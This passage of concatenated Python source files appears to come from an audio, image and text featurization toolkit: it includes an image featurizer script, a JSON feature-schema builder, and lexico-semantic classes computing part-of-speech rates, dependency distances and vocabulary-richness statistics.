'mfcc_11_mean_500ms','mfcc_11_std_500ms', 'mfcc_11_min_500ms', 'mfcc_11_max_500ms',
'mfcc_12_mean_500ms','mfcc_12_std_500ms', 'mfcc_12_min_500ms', 'mfcc_12_max_500ms',
'mfcc_13_mean_500ms','mfcc_13_std_500ms', 'mfcc_13_min_500ms', 'mfcc_13_max_500ms',
'mfcc_1_delta_mean_500ms','mfcc_1_delta_std_500ms', 'mfcc_1_delta_min_500ms', 'mfcc_1_delta_max_500ms',
'mfcc_2_delta_mean_500ms','mfcc_2_delta_std_500ms', 'mfcc_2_delta_min_500ms', 'mfcc_2_delta_max_500ms',
'mfcc_3_delta_mean_500ms','mfcc_3_delta_std_500ms', 'mfcc_3_delta_min_500ms', 'mfcc_3_delta_max_500ms',
'mfcc_4_delta_mean_500ms','mfcc_4_delta_std_500ms', 'mfcc_4_delta_min_500ms', 'mfcc_4_delta_max_500ms',
'mfcc_5_delta_mean_500ms','mfcc_5_delta_std_500ms', 'mfcc_5_delta_min_500ms', 'mfcc_5_delta_max_500ms',
'mfcc_6_delta_mean_500ms','mfcc_6_delta_std_500ms', 'mfcc_6_delta_min_500ms', 'mfcc_6_delta_max_500ms',
'mfcc_7_delta_mean_500ms','mfcc_7_delta_std_500ms', 'mfcc_7_delta_min_500ms', 'mfcc_7_delta_max_500ms',
'mfcc_8_delta_mean_500ms','mfcc_8_delta_std_500ms', 'mfcc_8_delta_min_500ms', 'mfcc_8_delta_max_500ms',
'mfcc_9_delta_mean_500ms','mfcc_9_delta_std_500ms', 'mfcc_9_delta_min_500ms', 'mfcc_9_delta_max_500ms',
'mfcc_10_delta_mean_500ms','mfcc_10_delta_std_500ms', 'mfcc_10_delta_min_500ms', 'mfcc_10_delta_max_500ms',
'mfcc_11_delta_mean_500ms','mfcc_11_delta_std_500ms', 'mfcc_11_delta_min_500ms', 'mfcc_11_delta_max_500ms',
'mfcc_12_delta_mean_500ms','mfcc_12_delta_std_500ms', 'mfcc_12_delta_min_500ms', 'mfcc_12_delta_max_500ms',
'mfcc_13_delta_mean_500ms','mfcc_13_delta_std_500ms', 'mfcc_13_delta_min_500ms', 'mfcc_13_delta_max_500ms']
return features, labels
```
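A minimal usage sketch for the featurizer above (not part of the original file), assuming it is run in the same module that defines `standard_featurize` and that a local `test.wav` placeholder file exists:

```python
# Hypothetical usage sketch -- 'test.wav' is a placeholder file name.
features, labels = standard_featurize('test.wav')
assert len(features) == len(labels)         # 208 values: 104 short-window + 104 ~500 ms stats
print(dict(zip(labels[:4], features[:4])))  # the first MFCC's mean/std/min/max
```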
#### File: features/image_features/featurize.py
```python
import helpers.audio_plot as ap
import numpy as np
import os, json, sys
from tqdm import tqdm
##################################################
## Helper functions. ##
##################################################
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def image_featurize(feature_set, imgfile, cur_dir, haar_dir):
if feature_set == 'image_features':
features, labels=imf.image_featurize(cur_dir, haar_dir, imgfile)
elif feature_set == 'vgg16_features':
features, labels=v16f.vgg16_featurize(imgfile)
elif feature_set == 'inception_features':
features, labels=incf.inception_featurize(imgfile)
elif feature_set == 'xception_features':
features, labels=xf.xception_featurize(imgfile)
elif feature_set == 'resnet_features':
features, labels=rf.resnet_featurize(imgfile)
elif feature_set == 'vgg19_features':
features, labels=v19f.vgg19_featurize(imgfile)
elif feature_set == 'tesseract_features':
transcript, features, labels = tf.tesseract_featurize(imgfile)
elif feature_set == 'squeezenet_features':
features, labels=sf.squeezenet_featurize(imgfile, cur_dir)
# make sure all the features do not have any infinity or NaN
features=np.nan_to_num(np.array(features))
features=features.tolist()
return features, labels
##################################################
## Main script ##
##################################################
# directory=sys.argv[1]
basedir=os.getcwd()
haar_dir=basedir+'/helpers/haarcascades'
foldername=sys.argv[1]
os.chdir(foldername)
cur_dir=os.getcwd()
listdir=os.listdir()
# settings directory
settingsdir=prev_dir(basedir)
sys.path.append(settingsdir)
from standard_array import make_features
settings=json.load(open(prev_dir(settingsdir)+'/settings.json'))
os.chdir(basedir)
image_transcribe=settings['transcribe_image']
default_image_transcriber=settings['default_image_transcriber']
try:
feature_sets=[sys.argv[2]]
except:
feature_sets=settings['default_image_features']
##################################################
## Only load relevant features ##
##################################################
if 'vgg16_features' in feature_sets:
import vgg16_features as v16f
if 'image_features' in feature_sets:
import image_features as imf
if 'inception_features' in feature_sets:
import inception_features as incf
if 'xception_features' in feature_sets:
import xception_features as xf
if 'resnet_features' in feature_sets:
import resnet_features as rf
if 'vgg19_features' in feature_sets:
import vgg19_features as v19f
if 'squeezenet_features' in feature_sets:
import squeezenet_features as sf
if image_transcribe == True or 'tesseract_features' in feature_sets:
import tesseract_features as tf
# get class label from folder name
labelname=foldername.split('/')
if labelname[-1]=='':
labelname=labelname[-2]
else:
labelname=labelname[-1]
##################################################
## Main loop ##
##################################################
# featurize all image files with the specified feature sets
for i in tqdm(range(len(listdir)), desc=labelname):
os.chdir(cur_dir)
if listdir[i][-4:] in ['.jpg', '.png']:
try:
imgfile=listdir[i]
sampletype='image'
if listdir[i][0:-4]+'.json' not in listdir:
# make new .JSON if it is not there with base array schema.
basearray=make_features(sampletype)
if image_transcribe==True:
for j in range(len(default_image_transcriber)):
transcript, features, labels = tf.tesseract_featurize(imgfile)
transcript_list=basearray['transcripts']
transcript_list['image'][default_image_transcriber[j]]=transcript
basearray['transcripts']=transcript_list
# featurize the image file with specified featurizers
for j in range(len(feature_sets)):
feature_set=feature_sets[j]
features, labels = image_featurize(feature_set, imgfile, cur_dir, haar_dir)
print(features)
try:
data={'features':features.tolist(),
'labels': labels}
except:
data={'features':features,
'labels': labels}
image_features=basearray['features']['image']
image_features[feature_set]=data
basearray['features']['image']=image_features
basearray['labels']=[labelname]
# write to .JSON
jsonfile=open(listdir[i][0:-4]+'.json','w')
json.dump(basearray, jsonfile)
jsonfile.close()
elif listdir[i][0:-4]+'.json' in listdir:
# overwrite existing .JSON if it is there.
basearray=json.load(open(listdir[i][0:-4]+'.json'))
transcript_list=basearray['transcripts']
# only re-transcribe if necessary
if image_transcribe==True:
for j in range(len(default_image_transcriber)):
if default_image_transcriber[j] not in list(transcript_list['image']):
transcript, features, labels = tf.tesseract_featurize(imgfile)
transcript_list['image'][default_image_transcriber[j]]=transcript
basearray['transcripts']=transcript_list
# only re-featurize if necessary (checks if relevant feature embedding exists)
for j in range(len(feature_sets)):
# load feature set
feature_set=feature_sets[j]
# only add in if it is not in the image feature list array
if feature_set not in list(basearray['features']['image']):
features, labels = image_featurize(feature_set, imgfile, cur_dir, haar_dir)
try:
data={'features':features.tolist(),
'labels': labels}
except:
data={'features':features,
'labels': labels}
print(features)
basearray['features']['image'][feature_set]=data
# only add label if necessary
label_list=basearray['labels']
if labelname not in label_list:
label_list.append(labelname)
basearray['labels']=label_list
# overwrite .JSON file
jsonfile=open(listdir[i][0:-4]+'.json','w')
json.dump(basearray, jsonfile)
jsonfile.close()
except:
print('error')
```
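For context, a hedged sketch of how this script is typically invoked; the folder name and feature set below are placeholders that map onto `sys.argv[1]` and `sys.argv[2]` in the script above:

```python
# Hypothetical invocation of the script above; paths are placeholders.
import os
os.chdir('features/image_features')
os.system('python3 featurize.py /path/to/flower_images vgg16_features')
# each .png/.jpg in the folder gains a sibling .json with the requested embedding
```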
#### File: allie/features/standard_array.py
```python
import os, time, psutil, json, platform
from datetime import datetime
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def make_features(sampletype):
# only add labels when we have actual labels.
features={'audio':dict(),
'text': dict(),
'image':dict(),
'video':dict(),
'csv': dict()}
transcripts={'audio': dict(),
'text': dict(),
'image': dict(),
'video': dict(),
'csv': dict()}
models={'audio': dict(),
'text': dict(),
'image': dict(),
'video': dict(),
'csv': dict()}
# getting settings can be useful to see if settings are the same in every
# featurization, as some featurizations can rely on certain settings to be consistent
prevdir=prev_dir(os.getcwd())
try:
settings=json.load(open(prevdir+'/settings.json'))
except:
# this is for folders that may be 2 layers deep in train_dir
settings=json.load(open(prev_dir(prevdir)+'/settings.json'))
data={'sampletype': sampletype,
'transcripts': transcripts,
'features': features,
'models': models,
'labels': [],
'errors': [],
'settings': settings,
}
return data
```
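For reference, a sketch of the dictionary that `make_features('audio')` returns, with key names taken directly from the function above; the `settings` value is whatever settings.json contains:

```python
# Sketch of the schema returned by make_features('audio')
base_schema = {
    'sampletype': 'audio',
    'transcripts': {'audio': {}, 'text': {}, 'image': {}, 'video': {}, 'csv': {}},
    'features': {'audio': {}, 'text': {}, 'image': {}, 'video': {}, 'csv': {}},
    'models': {'audio': {}, 'text': {}, 'image': {}, 'video': {}, 'csv': {}},
    'labels': [],
    'errors': [],
    'settings': {},  # parsed contents of settings.json
}
```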
#### File: blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py
```python
from blabla.sentence_processor.lexico_semantic_feature_engine import num_demonstratives
from blabla.utils.global_params import *
from collections import Counter
import numpy as np
import math
import blabla.utils.settings as settings
class Adjective_Rate(object):
"""Class to calculate the adjective rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adjective rate
Args:
None
Returns:
The total number of adjectives to the total number of words
"""
tot_num_adjs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_words += so.num_words()
return tot_num_adjs / tot_num_words
class Adposition_Rate(object):
"""Class to calculate the adposition rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Adverb_Rate(object):
"""Class to calculate the adverb rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Auxiliary_Rate(object):
"""Class to calculate the auxiliary rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(AUXILIARY)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Conjunction_Rate(object):
"""Class to calculate the conjunctions rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Determiner_Rate(object):
"""Class to calculate the determiner rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Interjection_Rate(object):
"""Class to calculate the interjection rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(INTERJECTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Noun_Rate(object):
"""Class to calculate the noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Numeral_Rate(object):
"""Class to calculate the numeral rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(NUMERAL)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Particle_Rate(object):
"""Class to calculate the particle rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(PARTICLE)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Pronoun_Rate(object):
"""Class to calculate the pronoun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Proper_Noun_Rate(object):
"""Class to calculate the proper noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PROPER_NOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Punctuation_Rate(object):
"""Class to calculate the punctuation rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PUNCTUATION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Subordinating_Conjunction_Rate(object):
"""Class to calculate the subordinating conjuction rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SUBORDINATING_CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Symbol_Rate(object):
"""Class to calculate the symbol rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SYMBOL)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Verb_Rate(object):
"""Class to calculate the verb rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of verbs to the total number of words
"""
tot_num_verbs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_words += so.num_words()
return tot_num_verbs / tot_num_words
class Demonstrative_Rate(object):
"""Class to calculate the demonstratives rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of demonstratives to the total number of words
"""
tot_num_demons, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_demons += num_demonstratives(so.stanza_doc)
tot_num_words += so.num_words()
return tot_num_demons / tot_num_words
class Possessive_Rate(object):
"""Class to calculate the possessive rate
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3642700/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the possessive rate
Args:
None
Returns:
The total number of adjectives and pronouns to the total number of words
"""
tot_num_adjs, tot_num_pron, tot_num_words = 0, 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return (tot_num_adjs + tot_num_pron) / tot_num_words
class Noun_Verb_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the number of verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun to verb
Args:
None
Returns:
The total number of nouns to the number of verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if tot_num_verbs != 0:
return tot_num_nouns / tot_num_verbs
return NOT_AVAILABLE
class Noun_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the total number of nouns and verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun ratio
Args:
None
Returns:
The total number of nouns to the total number of nouns and verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if (tot_num_nouns + tot_num_verbs) != 0:
return tot_num_nouns / (tot_num_nouns + tot_num_verbs)
return NOT_AVAILABLE
class Pronoun_Noun_Ratio(object):
"""Class to calculate the ratio of the number of pronouns to the total number of nouns
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun to noun ratio
Args:
None
Returns:
The ratio of the total number of pronouns to the number of nouns
"""
tot_num_prons, tot_num_nouns = 0, 0
for so in self.sentence_objs:
tot_num_prons += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if tot_num_nouns != 0:
return tot_num_prons / tot_num_nouns
return NOT_AVAILABLE
class Total_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = 0
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist += np.sum([abs(int(dep['id']) - dep['head']) for dep in sd])
return tot_dist
class Average_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist.append(sum([abs(int(dep['id']) - dep['head']) for dep in sd]))
if tot_dist:
return np.mean(tot_dist)
return NOT_AVAILABLE
class Total_Dependencies(object):
"""Class to calculate the number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of unique dependencies across sentences
Args:
None
Returns:
the total number of unique dependencies
"""
deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels.extend([dep['deprel'] for dep in sd])
return len(set(deprels))
class Average_Dependencies(object):
"""Class to calculate the average number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of unique dependencies across sentences
Args:
None
Returns:
the average number of unique dependencies
"""
num_deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels = set([dep['deprel'] for dep in sd])
num_deprels.append(len(deprels))
if num_deprels:
return np.mean(num_deprels)
return NOT_AVAILABLE
class Closed_Class_Word_Rate(object):
"""Class to calculate the proportion of closed class words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of close class words
Args:
None
Returns:
The ratio of the total number of determiners, prepositions, pronouns and conjunctions to the total number of words
"""
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
) / tot_num_words
class Open_Class_Word_Rate(object):
"""Class to calculate the proportion of open class word_count
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of open class words
Args:
None
Returns:
The ratio of the total number of nouns, verbs, adjectives and adverbs to the total number of words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return (
tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
) / tot_num_words
class Content_Density(object):
"""Class to calculate the content density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the content density of words
Args:
None
Returns:
The ratio of the total number of open class words to the total number of closed class words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs = 0, 0, 0, 0
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj = 0, 0, 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
numerator = tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
denominator = tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
if denominator == 0:
return NOT_AVAILABLE
return numerator / denominator
class Idea_Density(object):
"""Class to calculate the idea density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the idea density of words
Args:
None
Returns:
The ratio of the total number of verbs, adjectives, adverbs, prepositions, conjunctions to the number of words
"""
(
tot_num_verbs,
tot_num_adjs,
tot_num_advs,
tot_num_preps,
tot_num_cconjs,
tot_num_words,
) = (
0,
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_preps += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_cconjs += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_verbs + tot_num_adjs + tot_num_advs + tot_num_preps + tot_num_cconjs
) / tot_num_words
class Honore_Statistic(object):
"""Class to calculate the honore's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the honore's statistic
Args:
None
Returns:
The honore's statistic of the words
"""
all_words = []
num_unique_words_spoken, num_words_spoken_only_once = 0, 0
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
word_counts = dict(Counter(all_words))
for key, val in word_counts.items():
if val == 1:
num_words_spoken_only_once += 1
num_words = len(all_words)
if (num_words_spoken_only_once == num_unique_words_spoken) or (num_unique_words_spoken == 0) or (num_words == 0):
return NOT_AVAILABLE
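# Honore's statistic: R = 100 * log(N) / (1 - V1/V), where N = total words,
# V1 = words spoken exactly once, V = unique words (the guard above avoids V1 == V)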
honore_statistic = (100 * math.log(num_words)) / (
1 - (num_words_spoken_only_once) / (num_unique_words_spoken)
)
return honore_statistic
class Brunet_Index(object):
"""Class to calculate the brunet's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the brunet's statistic
Args:
None
Returns:
The brunet's statistic of the words
"""
num_unique_words_spoken = 0
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
num_words = len(all_words)
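# Brunet's index: W = N ** (V ** -0.165), where N = total words and V = unique words;
# lower values typically indicate a richer vocabulary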
brunet_index = math.pow(num_words, math.pow(num_unique_words_spoken, -0.165))
return brunet_index
class Type_Token_Ratio(object):
"""Class to calculate the type-token ratio
Ref: https://www.tandfonline.com/doi/abs/10.1080/02687038.2017.1303441
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the type-token statistic
